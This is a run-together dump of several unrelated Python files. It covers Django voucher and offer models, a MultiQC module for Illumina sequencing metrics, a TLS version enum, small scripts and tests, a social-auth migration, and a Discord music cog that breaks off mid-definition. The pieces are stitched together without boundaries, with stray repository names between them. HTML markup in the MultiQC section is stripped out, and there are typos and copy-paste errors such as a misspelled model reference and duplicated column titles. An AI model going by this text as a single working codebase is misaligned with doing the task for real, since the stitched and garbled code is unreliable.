(FIXED_PRICE, _("Get the products that meet the condition for a fixed price")), ) range = models.ForeignKey('offer.Range', null=True, blank=True) type = models.CharField(max_length=128, choices=TYPE_CHOICES) value = models.DecimalField(decimal_places=2, max_digits=12) # If this is not set, then there is no upper limit on how many products # can be discounted by this benefit. 
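# For example (illustrative only), a "25% off shirts" percentage benefit with
# max_affected_items=1 would discount a single shirt per basket, which __unicode__
# below renders as "(max 1 item)".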
max_affected_items = models.PositiveIntegerField(blank=True, null=True, help_text="""Set this to prevent the discount consuming all items within the range that are in the basket.""") class Meta: abstract = True def __unicode__(self): if self.type == self.PERCENTAGE: desc = u"%s%% discount on %s" % (self.value, str(self.range).lower()) elif self.type == self.MULTIBUY: desc = u"Cheapest product is free from %s" % str(self.range) elif self.type == self.FIXED_PRICE: desc = u"The products that meet the condition are sold for %s" % self.value else: desc = u"%.2f discount on %s" % (self.value, str(self.range).lower()) if self.max_affected_items == 1: desc += u" (max 1 item)" elif self.max_affected_items > 1: desc += u" (max %d items)" % self.max_affected_items return desc def apply(self, basket, condition=None): return Decimal('0.00') def clean(self): # All benefits need a range apart from FIXED_PRICE if self.type != self.FIXED_PRICE and not self.range: raise ValidationError("Benefits of type %s need a range" % self.type) class AbstractRange(models.Model): u""" Represents a range of products that can be used within an offer """ name = models.CharField(_("Name"), max_length=128) includes_all_products = models.BooleanField(default=False) included_products = models.ManyToManyField('product.Item', related_name='includes', blank=True) excluded_products = models.ManyToManyField('product.Item', related_name='excludes', blank=True) classes = models.ManyToManyField('product.ItemClass', related_name='classes', blank=True) __included_product_ids = None __excluded_product_ids = None __class_ids = None class Meta: abstract = True def __unicode__(self): return self.name def contains_product(self, product): excluded_product_ids = self._excluded_product_ids() if product.id in excluded_product_ids: return False if self.includes_all_products: return True if product.item_class_id in self._class_ids(): return True included_product_ids = self._included_product_ids() return product.id in included_product_ids def _included_product_ids(self): if None == self.__included_product_ids: self.__included_product_ids = [row['id'] for row in self.included_products.values('id')] return self.__included_product_ids def _excluded_product_ids(self): if None == self.__excluded_product_ids: self.__excluded_product_ids = [row['id'] for row in self.excluded_products.values('id')] return self.__excluded_product_ids def _class_ids(self): if None == self.__class_ids: self.__class_ids = [row['id'] for row in self.classes.values('id')] return self.__class_ids class AbstractVoucher(models.Model): u""" A voucher. 
This is simply a link to a collection of offers Note that there are three possible "usage" models: (a) Single use (b) Multi-use (c) Once per customer """ name = models.CharField(_("Name"), max_length=128, help_text="""This will be shown in the checkout and basket once the voucher is entered""") code = models.CharField(_("Code"), max_length=128, db_index=True, unique=True, help_text="""Case insensitive / No spaces allowed""") offers = models.ManyToManyField('offer.ConditionalOFfer', related_name='vouchers', limit_choices_to={'offer_type': VOUCHER}) SINGLE_USE, MULTI_USE, ONCE_PER_CUSTOMER = ('Single use', 'Multi-use', 'Once per customer') USAGE_CHOICES = ( (SINGLE_USE, "Can only be used by one customer"), (MULTI_USE, "Can only be used any number of times"), (ONCE_PER_CUSTOMER, "Can be used once by each customer"), ) usage = models.CharField(_("Usage"), max_length=128, choices=USAGE_CHOICES, default=MULTI_USE) start_date = models.DateField() end_date = models.DateField() # Summary information num_basket_additions = models.PositiveIntegerField(default=0) num_orders = models.PositiveIntegerField(default=0) total_discount = models.DecimalField(decimal_places=2, max_digits=12, default=Decimal('0.00')) date_created = models.DateField(auto_now_add=True) class Meta: abstract = True get_latest_by = 'date_created' def __unicode__(self): return self.name def save(self, *args, **kwargs): self.code = self.code.upper() super(AbstractVoucher, self).save(*args, **kwargs) def is_active(self, test_date=None): u""" Tests whether this voucher is currently active. """ if not test_date: test_date = datetime.date.today() return self.start_date <= test_date and test_date < self.end_date def is_available_to_user(self, user=None): u""" Tests whether this voucher is available to the passed user. Returns a tuple of a boolean for whether it is successulf, and a message """ is_available, message = False, '' if self.usage == self.SINGLE_USE: is_available = self.applications.count() == 0 if not is_available: message = "This voucher has already been used" elif self.usage == self.MULTI_USE: is_available = True elif self.usage == self.ONCE_PER_CUSTOMER: if not user.is_authenticated(): is_available = False message = "This voucher is only available to signed in users" else: is_available = self.applications.filter(voucher=self, user=user).count() == 0 if not is_available: message = "You have already used this voucher in a previous order" return is_available, message def record_usage(self, order, user): u""" Records a usage of this voucher in an order. 
""" self.applications.create(voucher=self, order=order, user=user) class AbstractVoucherApplication(models.Model): u""" For tracking how often a voucher has been used """ voucher = models.ForeignKey('offer.Voucher', related_name="applications") # It is possible for an anonymous user to apply a voucher so we need to allow # the user to be nullable user = models.ForeignKey('auth.User', blank=True, null=True) order = models.ForeignKey('order.Order') date_created = models.DateField(auto_now_add=True) class Meta: abstract = True def __unicode__(self): return u"'%s' used by '%s'" % (self.voucher, self.user) #!/usr/bin/env python import glob import logging import os import re import xml.etree.ElementTree as ET from collections import OrderedDict from datetime import datetime from typing import Dict import interop import numpy import pandas as pd from interop import py_interop_plot from multiqc import config from multiqc.modules.base_module import BaseMultiqcModule from multiqc.plots import bargraph, heatmap, linegraph, scatter, table from multiqc.utils import mqc_colour # Initialise the main MultiQC logger log = logging.getLogger("multiqc") HEADERS = { "Error Rate": { "title": "Error Rate (%)", "description": "The calculated error rate, as determined by a PhiX spike-in", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "Error Rate 35": { "title": "Error Rate 35 Cycles (%)", "description": "The calculated error rate for cycles 1-35.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "Error Rate 50": { "title": "Error Rate 35 Cycles (%)", "description": "The calculated error rate for cycles 1-50.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "Error Rate 75": { "title": "Error Rate 35 Cycles (%)", "description": "The calculated error rate for cycles 1-75.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "Error Rate 100": { "title": "Error Rate 100 Cycles (%)", "description": "The calculated error rate for cycles 1-100.", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please "hidden": True, }, "First Cycle Intensity": { "title": "Intensity Cycle 1", "description": "The average of the A channel intensity measured at the first cycle", }, "% Aligned": { "title": "Aligned (%)", "description": "Percentage of reads that aligned to the PhiX genome", "suffix": "%", "min": 0, "max": 100, "format": "{:,.0f}", # No decimal places please }, "% >= Q30": { "title": "% >= Q30", "description": "Percentage of reads with quality phred score of 30 or above", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "% Occupancy Proxy": { "title": "Occupancy Proxy (%)", # "description": "", "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "% Occupied": { "title": "Occupied (%)", "description": "The percentage of nanowells occupied by clusters, +/- 1 standard deviation.", "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "Projected Yield G": { "title": "Projected Yield ({})".format(config.base_count_prefix), "description": "The expected number of bases sequenced ({} base pairs over all 'usable cycles'".format( config.base_count_desc ), "shared_key": "base_count", "modify": lambda x: (x * 1000000000.0) * config.base_count_multiplier, # number is already in gigabases "hidden": True, }, "Yield G": { "title": "Yield 
({})".format(config.read_count_prefix), "description": "The number of bases sequenced ({} base pairs over all 'usable cycles'".format( config.base_count_desc ), "shared_key": "base_count", "modify": lambda x: (x * 1000000000.0) * config.base_count_multiplier, # number is already in gigabases }, "Cluster Count": { "title": "Clusters ({})".format(config.read_count_prefix), "description": "Number of clusters for each tile ({})".format(config.read_count_desc), "shared_key": "cluster_count", "modify": lambda x: x * config.read_count_multiplier, }, "Cluster Count Pf": { "title": "Clusters PF ({})".format(config.read_count_prefix), "description": "Number of clusters PF for each tile ({})".format(config.read_count_desc), "shared_key": "cluster_count", "modify": lambda x: x * config.read_count_multiplier, }, "% Pf": { "title": "Reads PF (%)", "description": "Percentage of clusters Passing Filter", "min": 0, "max": 100, "suffix": "%", "format": "{:,.0f}", # No decimal places please }, "Density": { "title": "Density", "description": "The density of clusters (in thousands per mm2) detected by image analysis, +/- 1 standard deviation.", "hidden": True, }, "Density Pf": { "title": "Density PF", "description": "The density of clusters PF (in thousands per mm2) detected by image analysis, +/- 1 standard deviation.", "hidden": True, }, "Phasing": { "title": "Phasing", "description": "The value used by RTA for the percentage of molecules in a cluster for which sequencing falls behind (phasing) the current cycle within a read.", }, "Phasing Offset": { "title": "Phasing Offset", "description": "The best-fit offset of the phasing corrections, calculated from the entire read.", "hidden": True, }, "Phasing Slope": { "title": "Phasing Slope", "description": "The best-fit slope of the phasing corrections, calculated from the entire read.", "hidden": True, }, "Prephasing": { "title": "Prephasing", "description": "The value used by RTA for the percentage of molecules in a cluster for which sequencing jumps ahead (prephasing) the current cycle within a read.", }, "Prephasing Offset": { "title": "Prephasing Offset", "description": "The best-fit offset of the prephasing corrections, calculated from the entire read.", "hidden": True, }, "Prephasing Slope": { "title": "Prephasing Slope", "description": "The best-fit slope of the prephasing corrections, calculated from the entire read.", "hidden": True, }, "Reads": { "title": "{} Reads".format(config.read_count_prefix), "description": "The number of reads ({})".format(config.read_count_desc), "shared_key": "read_count", "modify": lambda x: x * config.read_count_multiplier, }, "Reads Pf": { "title": "{} PF Reads".format(config.read_count_prefix), "description": "The number of passing filter reads ({})".format(config.read_count_desc), "shared_key": "read_count", "modify": lambda x: x * config.read_count_multiplier, }, "Tile Count": {"title": "Tiles", "description": "The number of tiles per lane.", "hidden": True,}, "Total Pf Reads": { "title": "{} PF Reads".format(config.read_count_prefix), "description": "The total number of passing filter reads for this lane ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": "read_count", }, "Total Reads": { "title": "{} Reads".format(config.read_count_prefix), "description": "The total number of reads for this lane ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": 
"read_count", }, "Mapped Reads Cv": { "title": "CV", "description": "The coefficient of variation for the number of counts across all indexes.", "format": "{:,.2f}", # 2 decimal places please }, "Max Mapped Reads": { "title": "{} Max Mapped Reads".format(config.read_count_prefix), "description": "The highest representation for any index ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": "read_count", }, "Min Mapped Reads": { "title": "{} Min Mapped Reads".format(config.read_count_prefix), "description": "The lowest representation for any index ({})".format(config.read_count_desc), "modify": lambda x: float(x) * config.read_count_multiplier, "format": "{:,.2f}", "shared_key": "read_count", }, "Total Fraction Mapped Reads": {"hidden": True}, "Fraction Mapped": {"hidden": True}, "Index1": {"title": "Index 1 (I7)", "description": "The sequence for the first Index Read.",}, "Index2": {"title": "Index 2 (I5)", "description": "The sequence for the second Index Read",}, "Project Name": {"title": "Project Name", "description": "Sample Project Name",}, "Sample Id": {"title": "Sample ID", "description": "The Sample ID given in the SampleSheet",}, } class SAV(BaseMultiqcModule): """ Generate SAV tables an Graphs including: - GRAPH: Intensity/Cycle/Channel - GRAPH: Clusters/Lane - GRAPH: Qscore Heatmap - GRAPH: Qscore Histogram - GRAPH: %Occ/%PF - TABLE: Run Summary """ def __init__(self): super(SAV, self).__init__( name="Illumina SAV", anchor="sav", info=" - Sequencing Metrics from Illumina sequencers", ) # Set variables run_info_xml = "" run_parameters_xml = "" illumina_dir = "" # Check if required files are found for f in self.find_log_files("SAV/xml"): if re.match(r".*[Rr]un[Ii]nfo\.xml", f["fn"]): run_info_xml = os.path.join(f["root"], f["fn"]) if re.match(r".*[Rr]un[Pp]arameters\.xml", f["fn"]): run_parameters_xml = os.path.join(f["root"], f["fn"]) # Assume single run for now if (os.path.dirname(run_info_xml) == os.path.dirname(run_parameters_xml)) and len( glob.glob(os.path.join(os.path.dirname(run_info_xml), "InterOp/*.bin")) ) > 0: illumina_dir = os.path.dirname(run_info_xml) else: log.debug("Skipping MultiQC_SAV, required files were not found or not in the right structure.") return None self.set_run_info(run_info_xml) self.load_metrics(illumina_dir) self.summary_qc() self.q_summary() self.imaging_qc() def load_metrics(self, illumina_dir) -> None: log.info("Loading Run Metrics") self.run_metrics = interop.read(run=illumina_dir, valid_to_load=interop.load_imaging_metrics(), finalize=True,) ############# # RUN INFO ############# def set_run_info(self, run_info_xml: str) -> None: log.info("Loading Run Info") run_info_xml = ET.parse(run_info_xml) root = run_info_xml.getroot() for run in root: run_number = run.attrib["Number"] flowcell = [fc.text for fc in run.iter("Flowcell")][0] instrument_id = [fc.text for fc in run.iter("Instrument")][0] run_date = [fc.text for fc in run.iter("Date")][0] try: parsed_run_date = datetime.strftime(datetime.strptime(run_date, "%y%m%d"), "%d-%m-%Y") except ValueError: parsed_run_date = datetime.strftime(datetime.strptime(run_date, "%m/%d/%Y %I:%M:%S %p"), "%d-%m-%Y") read_info = "" for read in run.iter("Read"): key = ( f"Read {read.attrib['Number']} (I)" if read.attrib["IsIndexedRead"] == "Y" else f"Read {read.attrib['Number']}" ) read_info += f"
  • {key}: {read.attrib['NumCycles']} Cycles
  • " self.add_section( name="Run Info", anchor="sav-run-info", content=f"""

    Instrument

    • Instrument ID: {instrument_id}
    • Flowcell: {flowcell}
    • Run Number: {run_number}
    • Run Date: {parsed_run_date}

    Settings

      {read_info}
    """, ) ############# # SUMMARY QC ############# def summary_qc(self) -> None: """ Generate MultiQC sections related to Summary tables :return: None """ log.info("Gathering Read summary metrics") summary_read = pd.DataFrame(interop.summary(self.run_metrics, level="Read")) summary_nonindex = pd.DataFrame(interop.summary(self.run_metrics, level="NonIndex")) summary_total = pd.DataFrame(interop.summary(self.run_metrics, level="Total")) self.add_section( name="Summary Read Metrics", anchor="sav-read-summary", description="Summary metrics per Read", plot=self.read_summary_table(self.parse_read_summary(summary_read, summary_nonindex, summary_total)), ) log.info("Gathering Lane summary metrics") summary_lane = pd.DataFrame(interop.summary(self.run_metrics, level="Lane")) self.add_section( name="Summary Lane Metrics", anchor="sav-lane-summary", description="Summary metrics per Lane per Read", plot=self.lane_summary_table(self.parse_lane_summary(summary_lane)), ) # - GRAPH: Clusters/Lane log.info("Generating 'Clusters/Lane' plot") self.add_section( name="Clusters/Reads per Lane", anchor="sav-clusters-lane", description="Total Cluster/Read count per Lane", plot=self.clusters_lane_plot(self.parse_lane_summary(summary_lane)), ) def parse_read_summary( self, read_metrics: pd.DataFrame, non_index_metrics: pd.DataFrame, total_metrics: pd.DataFrame ) -> Dict: """ Parse "Read Summary" table DataFrame :return: Dict containing table data """ table_data: dict = self._parse_reads(read_metrics) for read, data in non_index_metrics.iterrows(): table_data["Non-Indexed"] = data.to_dict() for read, data in total_metrics.iterrows(): table_data["Total"] = data.to_dict() return table_data def read_summary_table(self, data: pd.DataFrame) -> table.plot: """ Format "Read Summary" data dict and add plot config. :return: table object to be used in a MultiQC section """ headers = {header: HEADERS[header] for header in interop.summary_columns(level="Lane")} table_config = { "namespace": "SAV", "id": "sav-read-metrics-summary-table", "col1_header": "Read", } return table.plot(data, headers, table_config) def parse_lane_summary(self, data: pd.DataFrame) -> Dict: """ Parse "Lane Summary" table DataFrame :return: Dict containing table data """ lanes = data.groupby("Lane") table_data: dict = {} for lane, reads in lanes: lane_data = {} reads_dict = self._parse_reads(reads, key_prefix=f"Lane {lane}") table_data.update(reads_dict) return table_data def lane_summary_table(self, data: Dict) -> table.plot: """ Format "Lane Summary" data dict and add plot config. :return: table object to be used in a MultiQC section """ headers = {header: HEADERS[header] for header in interop.summary_columns(level="Lane")} table_config = { "namespace": "SAV", "id": "sav-lane-metrics-summary-table", "col1_header": "Lane - Read", } return table.plot(data, headers, table_config,) def clusters_lane_plot(self, data: Dict) -> bargraph.plot: """ Format "Clusters per Lane" data dict and add plot config. 
:return: bar plot object to be used in a MultiQC section """ cluster_data = {} read_data = {} for key, value in data.items(): lane = int(value["Lane"]) if f"Lane {lane}" not in cluster_data: cluster_data[f"Lane {lane}"] = { "clusters": value["Cluster Count"], "clusters_pf": value["Cluster Count Pf"], "clusters_diff": value["Cluster Count"] - value["Cluster Count Pf"], } read_data[f"Lane {lane}"] = { "reads": value["Reads"], "reads_pf": value["Reads Pf"], "reads_diff": value["Reads"] - value["Reads Pf"], } else: cluster_data[f"Lane {lane}"]["clusters"] += value["Cluster Count"] cluster_data[f"Lane {lane}"]["clusters_pf"] += value["Cluster Count Pf"] cluster_data[f"Lane {lane}"]["clusters_diff"] += value["Cluster Count"] - value["Cluster Count Pf"] read_data[f"Lane {lane}"]["reads"] += value["Reads"] read_data[f"Lane {lane}"]["reads_pf"] += value["Reads Pf"] read_data[f"Lane {lane}"]["reads_diff"] += value["Reads"] - value["Reads Pf"] cats = [OrderedDict(), OrderedDict()] cats[0]["clusters_pf"] = {"name": "Clusters PF"} cats[0]["clusters_diff"] = {"name": "Clusters not PF"} cats[1]["reads_pf"] = {"name": "Reads PF"} cats[1]["reads_diff"] = {"name": "Reads not PF"} plot_config = { "id": "sav-summary-clusters-reads-lane-plot", "title": "SAV: Cluster/Reads per Lane", "data_labels": ["Clusters", "Reads"], "ylab": "Lane", } return bargraph.plot([cluster_data, read_data], cats, plot_config) def _parse_reads(self, reads_df: pd.DataFrame, key_prefix: str = None) -> Dict: """ Utility function to parse a "Reads" dataframe to dict :return: Reads dict """ reads_dict = {} reads_df = reads_df.set_index("ReadNumber") for read, data in reads_df.iterrows(): key = f"Read {read}" + " (I)" if data["IsIndex"] == 89 else f"Read {read}" if key_prefix: key = f"{key_prefix} - {key}" reads_dict[key] = data.drop("IsIndex").to_dict() return reads_dict ############# # Q SUMMARY ############# def q_summary(self) -> None: """ Generate MultiQC sections related to Qscore :return: None """ # - GRAPH: Qscore Heatmap log.info("Generating 'Qscore Heatmap' plot") self.add_section( name="Qscore Heatmap", anchor="sav-qscore-heatmap", description="The Qscore Heat Map provides an overview of quality scores across cycles.", plot=self.qscore_heatmap_plot(), ) # - GRAPH: Qscore Histogram log.info("Generating 'Qscore Histogram' plot") self.add_section( name="Qscore Histogram", anchor="sav-qscore-histogram", description="Qscore Histogram graphs the number of bases by quality score. The quality score is cumulative for the current cycle. Only bases from reads that pass the quality filter are included.", plot=self.qscore_histogram_plot(), ) def qscore_heatmap_plot(self) -> heatmap.plot: """ Get heatmap data from run_metrics object Note: this function has *much* room for improvement, but we need to wait for further developments in the InterOp library. In the mean time, this will have to do. 
:return: heatmap plot object to be used in a MultiQC section """ options = py_interop_plot.filter_options(self.run_metrics.run_info().flowcell().naming_method()) rows = py_interop_plot.count_rows_for_heatmap(self.run_metrics) cols = py_interop_plot.count_columns_for_heatmap(self.run_metrics) dataBuffer = numpy.zeros((rows, cols), dtype=numpy.float32) data = py_interop_plot.heatmap_data() try: py_interop_plot.plot_qscore_heatmap(self.run_metrics, options, data, dataBuffer.ravel()) except py_interop_plot.invalid_filter_option: pass plot_data = dataBuffer.transpose().tolist() # cycles x_cats = list(range(0, cols)) # qscore y_cats = list(range(0, rows)) plot_config = { "id": "sav-qscore-heatmap-plot", "title": "SAV: Qscore Heatmap", "xTitle": "Cycle", "yTitle": "Qscore", "square": False, "colstops": [ [0, "#FFFFFF"], [0.1, "#1a9850"], [0.2, "#66bd63"], [0.3, "#a6d96a"], [0.4, "#d9ef8b"], [0.5, "#ffffbf"], [0.6, "#fee08b"], [0.7, "#fdae61"], [0.8, "#f46d43"], [0.9, "#d73027"], [1, "#a50026"], ], } return heatmap.plot(plot_data, x_cats, y_cats, plot_config) def qscore_histogram_plot(self) -> linegraph.plot: """ Get histogram data from run_metrics object Note: this function has *much* room for improvement, but we need to wait for further developments in the InterOp library In the mean time, this will have to do. :return: linegraph plot object to be used in a MultiQC section """ bar_data = py_interop_plot.bar_plot_data() options = py_interop_plot.filter_options(self.run_metrics.run_info().flowcell().naming_method()) py_interop_plot.plot_qscore_histogram(self.run_metrics, options, bar_data) hist = {} qscore = [] reads = [] binsize = [] for i in range(bar_data.size()): qscore = [bar_data.at(i).at(j).x() for j in range(bar_data.at(i).size())] reads = [bar_data.at(i).at(j).y() for j in range(bar_data.at(i).size())] binsize = [bar_data.at(i).at(j).width() for j in range(bar_data.at(i).size())] i = 0 while i < len(qscore): j = 0 while j < binsize[i]: hist.update({qscore[i] + j: reads[i]}) j += 1 i += 1 plot_data = {bar_data.title(): hist} plot_config = { "id": "sav-qscore-histogram-plot", "title": "SAV: Qscore Histogram", "xlab": "Qscore", "ylab": "Reads (Billion)", } return linegraph.plot(plot_data, plot_config) ############# # IMAGING QC ############# def imaging_qc(self) -> None: """ Generate MultiQC sections related to Imaging. 
This includes: - Plot: Intensity/Cycle/Channel - Plot: %Occ/%PF :return: None """ log.info("Gathering Imaging metrics") imaging = pd.DataFrame(interop.imaging(self.run_metrics)) plot_data = self.parse_imaging_table(imaging) # - GRAPH: Intensity/Cycle/Channel if len(plot_data.get("intensity_cycle", [])) > 0: log.info("Generating 'Intensity per Cycle' plot") self.add_section( name="Intensity per Cycle", anchor="sav-intensity-cycle", description="Intensity by color and cycle of the 90% percentile of the data for each tile", plot=self.intensity_cycle_plot(plot_data.get("intensity_cycle", [])), ) # - GRAPH: %Occ/%PF log.info("Generating '% PF vs % Occupied' plot") if len(plot_data.get("occ_vs_pf", [])) > 0: self.add_section( name="% PF vs % Occupied", anchor="sav-imaging-pf-vs-occ", description="% Clusters passing filter vs % Wells Occupied", plot=self.occ_vs_pf_plot(plot_data.get("occ_vs_pf", [])), ) def parse_imaging_table(self, data: pd.DataFrame) -> Dict: """ Parse full imaging table DataFrame :return: Dict containing data for intesity per cylce plot (key:"intensity_cycle") and %occ vs %pf plot (key: ""occ_vs_pf") """ # set color scale for occ_pf cscale = mqc_colour.mqc_colour_scale() colors = cscale.get_colours("Dark2") per_lane = data.groupby("Lane") occ_pf = {} intensity_cycle = {} for lane, lane_data in per_lane: lane = int(lane) # prep intensity_cycle CHANNEL_SETS = [{"P90/RED", "P90/GREEN"}, {"P90/Red", "P90/Green"}, {"P90/G", "P90/A", "P90/T", "P90/C"}] channels = set() for channel_set in CHANNEL_SETS: if channel_set.issubset(lane_data.columns): channels = channel_set # prep occ_pf if not f"Lane {lane}" in occ_pf: occ_pf[f"Lane {lane}"] = [] prev_occ = 0 prev_pf = 0 # parse imaging table lane for _, row in lane_data.iterrows(): # intensity_cyle cycle = int(row["Cycle"]) for channel in channels: intensity = float(row[channel]) if not channel in intensity_cycle: intensity_cycle[channel] = {} if not cycle in intensity_cycle[channel]: intensity_cycle[channel].update({cycle: 0}) intensity_cycle[channel][cycle] += intensity # occ_pf if {"% Occupied", "% Pass Filter"}.issubset(lane_data.columns): occ = float(row["% Occupied"]) pf = float(row["% Pass Filter"]) if occ != prev_occ or pf != prev_pf: prev_occ = occ prev_pf = pf occ_pf[f"Lane {lane}"].append({"x": occ, "y": pf, "color": colors[lane]}) else: occ_pf = {} return {"intensity_cycle": intensity_cycle, "occ_vs_pf": occ_pf} def intensity_cycle_plot(self, data: Dict) -> linegraph.plot: """ Format Intensity per Cycle data dict and add plot config. :return: linegraph plot object to be used in a MultiQC section """ # get keys from data key_color_dict = {} for key in data: if re.match(r"\w+/red", key, re.IGNORECASE): key_color_dict[key] = "red" elif re.match(r"\w+/green", key, re.IGNORECASE): key_color_dict[key] = "green" elif re.match(r"\w+/G", key): key_color_dict[key] = "blue" elif re.match(r"\w+/A", key): key_color_dict[key] = "black" elif re.match(r"\w+/T", key): key_color_dict[key] = "green" elif re.match(r"\w+/C", key): key_color_dict[key] = "red" plot_config = { "id": "sav-intensity-vs-cycle-plot", "title": "SAV: Intensity per cycle", "xlab": "Cycle", "ylab": "Intensity", "colors": key_color_dict, } return linegraph.plot(data, plot_config) def occ_vs_pf_plot(self, data: Dict) -> scatter.plot: """ Format %Occ vs %PF data dict and add plot config. 
:return: scatter plot object to be used in a MultiQC section """ plot_config = { "id": "sav-pf-vs-occ-plot", "title": "SAV: % Passing Filter vs % Occupied", "xlab": "% Occupied", "ylab": "% Passing Filter", "xmin": 0, "xmax": 100, "ymin": 0, "ymax": 100, } return scatter.plot(data, plot_config) from .enum_props import EnumProps from ..const import tls, dtls class SSlVersions(EnumProps): def __init__(self, ssl_versions=None, is_dtls=True): self.is_dtls = is_dtls if self.is_dtls: self.EnumClass = dtls.ProtocolVersion self.supported = [ dtls.ProtocolVersion.DTLS_1_2.name ] else: self.EnumClass = tls.ProtocolVersion self.supported = [ tls.ProtocolVersion.TLS_1_2.name ] super(SSlVersions, self).__init__(ssl_versions) pass sentiment/basedict/LoadDict.py1-10 # -*- coding:utf-8 -*- """ ------------------------------------------------- File Name: LoadDict Description: Author: Miller date: 2017/9/19 0019 ------------------------------------------------- """ __author__ = 'Miller' import pandas as pd class LoadDict: def __init__(self): pass @staticmethod def load_dict(): negdict = [] posdict = [] notdict = [] plusdict = [] file = pd.read_csv('../../data/sentiment/dict/negdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): negdict.append(file[0][i]) file = pd.read_csv('../../data/sentiment/dict/posdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): posdict.append(file[0][i]) file = pd.read_csv('../../data/sentiment/dict/notdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): notdict.append(file[0][i]) file = pd.read_csv('../../data/sentiment/dict/plusdict.txt', header=None, encoding='utf-8') for i in range(len(file[0])): plusdict.append(file[0][i]) return negdict, posdict, notdict, plusdict from model import Filme, Serie, Playlist vingadores = Filme('vingadores', 2018, 160) vingadores.dar_likes() vingadores.dar_likes() atlanta = Serie('atlanta', 2018, 2) enola_holmes = Serie('', 2020, 124) enola_holmes.dar_likes() enola_holmes.dar_likes() enola_holmes.dar_likes() enola_holmes.dar_likes() lista_filmes_e_series = [vingadores, atlanta, enola_holmes] playlist = Playlist('Minha Playlist', lista_filmes_e_series) print(f'Tamanho da playlist: {len(playlist)}') for programa in playlist: print(programa) from HMM.Markovify import Markovify from nltk.corpus import brown def hmm_test(): training_corpus = brown.tagged_sents(categories='adventure', tagset='universal') model = Markovify(smoothing='max') model = model.fit(training_corpus) tagged_test = model.predict(['My', 'first', 'sentence']) print(tagged_test) if __name__ == '__main__': hmm_test() # -*- coding: utf-8 -*- """ Created on Tue Dec 22 11:52:11 2020 @author: xavier.mouy """ #import pytest import os from ecosound.core.annotation import Annotation def get_paths(): """ Define paths of the test data.""" paths = {'test_dir': os.path.dirname(os.path.realpath(__file__))} paths['data_dir'] = os.path.abspath(os.path.join(os.path.dirname( __file__ ), os.pardir, 'data')) paths['raven_annot_dir'] = os.path.join(paths['data_dir'],'Raven_annotations') paths['pamlab_annot_dir'] = os.path.join(paths['data_dir'],'PAMlab_annotations') paths['wav_files_dir'] = os.path.join(paths['data_dir'],'wav_files') # Raven annotations files raven_annot_files = [] raven_annot_files.append({'filename': '67674121.181018013806.Table.1.selections.txt', 'annot_number': 773, 'duplicates': 0}) raven_annot_files.append({'filename': 'AMAR173.4.20190916T061248Z.Table.1.selections.txt', 'annot_number': 1114, 'duplicates': 557}) 
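# Note: 'annot_number' is the raw row count of each Raven selection table and 'duplicates'
# the number of duplicated rows expected to be dropped on import; the tests below check
# that len(annot) == annot_number - duplicates after from_raven().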
paths['raven_annot_files'] = raven_annot_files return paths def test_len_is_0(): """ Test len of annot is 0 upon instantiation. """ annot = Annotation() assert len(annot) == 0 return None def test_from_raven_singlefile(fileidx=0): """ Test number of annotations when importing a single Raven file. Only use one file for this test defined by fileidx=0 """ paths = get_paths() annot = Annotation() annot.from_raven(os.path.join(paths['raven_annot_dir'],paths['raven_annot_files'][fileidx]['filename']), verbose=False) assert len(annot) == paths['raven_annot_files'][fileidx]['annot_number'] - paths['raven_annot_files'][fileidx]['duplicates'] return None def test_from_raven_singlefile_with_duplicates(fileidx=1): """ Test that Raven annotation duplicates are removed correctly. """ paths = get_paths() annot = Annotation() annot.from_raven(os.path.join(paths['raven_annot_dir'], paths['raven_annot_files'][fileidx]['filename']), verbose=False) assert len(annot) == paths['raven_annot_files'][fileidx]['annot_number'] - paths['raven_annot_files'][fileidx]['duplicates'] return None def test_from_raven_dir(): """ Test number of annotations when importing full folder (Raven). """ paths = get_paths() total_annotations = 0 for file in paths['raven_annot_files']: total_annotations += file['annot_number'] - file['duplicates'] annot = Annotation() annot.from_raven(paths['raven_annot_dir'], verbose=False) assert len(annot) == total_annotations return None # print(len(annot2)) jaddison/django-simple-socialauth # -*- coding: utf-8 -*- # Generated by Django 1.9.12 on 2017-03-06 15:58 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='SocialAccount', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('provider', models.CharField(max_length=32)), ('uid', models.CharField(max_length=256)), ('access_token', models.TextField(blank=True, default='')), ('secret', models.TextField(blank=True, default='')), ('expires', models.DateTimeField(blank=True, null=True)), ('_data', models.TextField(blank=True, default='{}', help_text='Original token response from the OAuth provider.')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='social_accounts', to=settings.AUTH_USER_MODEL)), ], ), migrations.AlterUniqueTogether( name='socialaccount', unique_together=set([('uid', 'provider')]), ), ] import datetime as dt from typing import Any, Optional, Union import discord import wavelink from discord.ext import commands from ...core import Bot from ...utils.bettercog import BetterCog from .utils import ( HZ_BANDS, LYRICS_URL, TIME_REGEX, URL_REGEX, EQGainOutOfBounds, InvalidEQPreset, InvalidRepeatMode, InvalidTimeString, MaxVolume, MinVolume, NoLyricsFound, NoMoreTracks, NonExistentEQBand, NoPreviousTracks, Player, PlayerIsAlreadyPaused, QueueIsEmpty, RepeatMode, VolumeTooHigh, VolumeTooLow, ) class Music(BetterCog, wavelink.WavelinkMixin): def __init__(self, bot: Bot): super().__init__(bot) self.wavelink = bot.wavelink_client @commands.Cog.listener() async def 